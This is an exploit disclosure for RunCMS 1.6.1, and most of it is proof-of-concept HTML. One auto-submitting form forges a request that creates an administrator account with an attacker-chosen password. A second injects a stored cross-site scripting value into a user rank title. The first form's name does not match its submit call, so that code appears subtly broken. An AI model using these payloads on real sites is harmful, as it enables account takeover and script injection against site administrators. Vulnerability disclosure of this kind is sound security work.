################################################################### RunCMS 1.6.1 Multiple XSS and XSRF Vulnerabilties by NBBN ################################################################### [b] 1) Create Webmaster (admin) XSRF Vulnerability[/b] <html><head></head><body onLoad="javascript:document.attack.submit()"> <form action="http://localhost/xampp/runcms/modules/system/admin.php"; method="post" enctype="multipart/form-data" name="r"> <input type="hidden" name="uname" value="Attacker"> <input type="hidden" name="name" value="Attacker"> <input type="hidden" name="email" value="attack@xxxxxxxxxx"> <input type="hidden" name="url" value=""> <input type="hidden" name="user_avatar" value="blank.gif"> <input type="hidden" name="theme" value="helloween"> <input type="hidden" name="timezone_offset" value="0"> <input type="hidden" name="language" value="deutsch"> <input type="hidden" name="user_icq" value=""> <input type="hidden" name="user_aim" value=""> <input type="hidden" name="user_msnm" value=""> <input type="hidden" name="user_from" value=""> <input type="hidden" name="user_occ" value=""> <input type="hidden" name="user_intrest" value=""> <input type="hidden" name="user_birth%5b2%5D" value=""> <input type="hidden" name="user_birth%5B1%5D" value=""> <input type="hidden" name="user_birth%5BO%5D" value=""> <input type="hidden" name="user_sig" value=""> <input type="hidden" name="umode" value="flat"> <input type="hidden" name="uorder" value="1"> <input type="hidden" name="bio" value=""> <input type="hidden" name="rank" value="7"> <input type="hidden" name="pass" value="Password"> <input type="hidden" name="pass2" value="Password"> <input type="hidden" name="fct" value="users"> <input type="hidden" name="op" value="addUser"> <input type="hidden" name="submit" value="%DCbernehmen"> Also with XSRF an attacker can update the profile of all users. He can change the password etc... [b]2) Cross-Site Scripting (an attacker can only attack an admin)[/b] <html><head></head><body onLoad="javascript:document.r.submit()"> <form action="http://localhost/xampp/runcms/modules/system/admin.php"; method="post" enctype="multipart/form-data" name="r"> <input type="text" class="text" name="rank_title" size="30" maxlength="50" value="<marquee>Cross-Site Scritping :-("/> <input type="hidden" name="fct" value="userrank"> <input type="hidden" name="op" value="RankForumAdd"> </form> </body>
